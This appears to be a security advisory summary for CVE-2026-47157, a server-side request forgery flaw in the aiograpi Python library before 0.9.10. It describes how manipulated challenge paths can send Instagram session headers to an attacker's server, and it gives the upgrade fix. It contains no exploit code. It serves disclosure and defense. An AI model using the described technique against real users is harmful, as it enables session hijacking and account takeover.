CVE-2026-47157: 
Python Analisi e mitigazione delle vulnerabilità

CVE-2026-47157 is a Server-Side Request Forgery (SSRF) vulnerability in the aiograpi Python library (pip package) affecting all versions before 0.9.10. The flaw involves unsafe handling of server-supplied signup challenge paths, where the library accepted and used these paths to build request URLs without first validating that they pointed to legitimate Instagram API endpoints. It was published by the maintainer on May 17, 2026, and added to the GitHub Advisory Database on May 23, 2026. The vulnerability carries a CVSS v3.1 base score of 6.5 (Medium/Moderate) (GitHub Advisory, Repo Advisory).

The root cause is classified as CWE-918 (Server-Side Request Forgery), where the library failed to validate server-supplied challenge path values before incorporating them into outbound HTTP request URLs. An attacker who can influence the challenge response payload — for example via a local network interception, DNS spoofing, or proxy compromise — can supply an arbitrary external URL as the challenge path. The library would then send challenge-handling requests (including captcha solving and phone/SMS form submissions) to the attacker-controlled host, carrying the client's existing Instagram session headers. The fix in version 0.9.10 introduces path validation prior to URL construction for all challenge-related operations (GitHub Advisory, Repo Advisory).

Successful exploitation results in a high confidentiality impact: the client's Instagram session headers (which may include authentication tokens or cookies) are exfiltrated to an attacker-controlled server. This could allow an attacker to hijack the victim's Instagram session, access account data, or perform actions on behalf of the user. There is no direct integrity or availability impact, but session token theft could enable significant downstream account compromise (GitHub Advisory).

Upgrade aiograpi to version 0.9.10 or later, which validates challenge paths before building URLs, solving captcha challenges, or submitting phone/SMS challenge forms. No configuration-based workaround is documented; upgrading is the only recommended remediation. Users can update via pip: pip install --upgrade aiograpi (GitHub Advisory, Repo Advisory).